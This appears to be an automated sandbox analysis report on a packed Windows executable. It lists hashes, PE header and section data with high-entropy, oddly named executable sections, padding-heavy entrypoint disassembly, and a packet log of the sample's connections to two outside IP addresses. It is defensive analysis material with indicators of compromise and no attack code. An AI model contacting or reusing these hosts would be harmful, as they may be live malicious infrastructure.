SSDEEP:	98304:hOz2MJHt7ylFablAuWSvn0n/5b0GC08A6PlATT9si+oc2pWwehjcuv03usdbQgST:SbxN+Qvn0nBb0N0pg2NZowcckAuKkVwL
TLSH:	AD5633E944594681ED8DF77306D368F2CFCCAD9887E51879BBCF992028576508A33CD8
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................<m.............. ...`m...@.. ....................... .......(_...@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xf2e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676D92AB [Thu Dec 26 17:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F22758D5CEAh
punpckhdq mm3, qword ptr [esi+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F22758D7CE5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d6000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d81f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x6d4000	0x43d600	084841be1bbe456e3a67a80de87fd749	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d6000	0x53c	0x400	7bef755653e49c279cf233b12371bf5c	False	0.6845703125	data	5.674634391310955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d8000	0x2000	0x200	6e9890d240b48e1a4145e7c2679977e3	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6da000	0x2aa000	0x200	68d7e3ce25faf511334836d6d0e3c71c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
muzridtf	0x984000	0x1a8000	0x1a6800	333f456993348fb8dd3d10f66d13ab5d	False	0.9950310882026627	data	7.9544310264435145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yeswpvds	0xb2c000	0x2000	0x400	2335216a53468336626ff854bcb23b9c	False	0.716796875	data	5.614015475091432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb2e000	0x4000	0x2200	e64b6dc35b42ecbe2a427c420dcad909	False	0.006548713235294118	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb2a2d0	0x244	data			0.4689655172413793
RT_MANIFEST	0xb2a514	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 15:07:37.177781105 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:37.177836895 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:37.177923918 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:37.181360006 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:37.181381941 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:38.981466055 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:38.982443094 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:38.982480049 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:38.984100103 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:38.984183073 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:39.002758980 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:39.003072977 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:39.060182095 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:39.060231924 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:39.098880053 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:39.139345884 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:39.856976986 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:39.857094049 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:39.857146025 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:39.858190060 CET	49730	443	192.168.2.4	3.218.7.103
Dec 27, 2024 15:07:39.858205080 CET	443	49730	3.218.7.103	192.168.2.4
Dec 27, 2024 15:07:51.918945074 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.041357040 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.041518927 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.049308062 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.170466900 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170483112 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170551062 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170561075 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170610905 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.170663118 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.170730114 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170775890 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.170881033 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170891047 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.170942068 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.171093941 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.171142101 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.171191931 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.171204090 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.171236992 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.171256065 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.290628910 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.290699005 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.290738106 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.290755033 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.290766001 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.290808916 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.290882111 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.290891886 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.290939093 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.334837914 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.334954977 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.454629898 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.454705954 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.498539925 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.618617058 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.618685007 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:52.822573900 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:52.822714090 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.062684059 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.063146114 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.063230038 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.183939934 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.183954954 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.184026003 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.184061050 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.184182882 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.184222937 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.184259892 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.185090065 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.185106993 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.185168982 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.185267925 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.185314894 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.185324907 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.185365915 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.185823917 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.185863018 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.186024904 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186065912 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.186155081 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186192989 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.186311007 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186359882 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.186395884 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186404943 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186454058 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186455965 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.186501980 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186531067 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186651945 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186775923 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186785936 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186825037 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186908960 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.186990023 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187037945 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187140942 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187280893 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187323093 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.187372923 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.187381029 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187421083 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.187422037 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187458992 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.187627077 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187664986 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.187695026 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187731028 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.187769890 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.187810898 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.230511904 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.230658054 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.303951979 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.304055929 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.304065943 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.304141998 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.304179907 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.304234028 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.304694891 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.304879904 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.304986000 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.305037975 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.305274010 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.305618048 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.305876970 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.305886984 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.305927992 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.306001902 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.306096077 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.306169033 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.306212902 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.306529999 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.306943893 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.306953907 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307012081 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307058096 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307068110 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307110071 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307146072 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307167053 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307192087 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307210922 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307220936 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307265043 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307338953 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307385921 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307394028 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307410002 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307444096 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307460070 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307539940 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307573080 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307590961 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307615995 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307679892 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307723045 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.307724953 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307854891 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307895899 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.307990074 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308022022 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308154106 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308242083 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308279991 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308290958 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308414936 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308425903 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308546066 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308554888 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308645964 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308655024 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308696032 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308706045 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308809996 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308825016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308890104 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308898926 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.308998108 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309006929 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309034109 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309112072 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309119940 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309129953 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309220076 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309228897 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.309298038 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.352015018 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.423923016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.423958063 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424067020 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424076080 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424130917 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424174070 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424182892 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424216032 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424452066 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.424973965 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.425051928 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.426222086 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426232100 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426289082 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426374912 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426666975 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426676035 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426901102 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.426911116 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427061081 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427069902 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427167892 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427179098 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427556992 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427566051 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427642107 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427650928 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427903891 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.427911997 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428045988 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428097010 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428215981 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428245068 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428459883 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428601980 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428611040 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428621054 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428874016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.428883076 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429058075 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429066896 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429125071 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429133892 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429358959 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429368019 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429451942 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429522038 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429651976 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429661989 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429810047 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.429819107 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430085897 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430094957 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430193901 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430203915 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430316925 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430326939 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430515051 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430571079 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430686951 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430696011 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430861950 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430907011 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.430983067 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.431071997 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.431308031 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.431391001 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.546689987 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.546708107 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.546760082 CET	80	49732	185.121.15.192	192.168.2.4
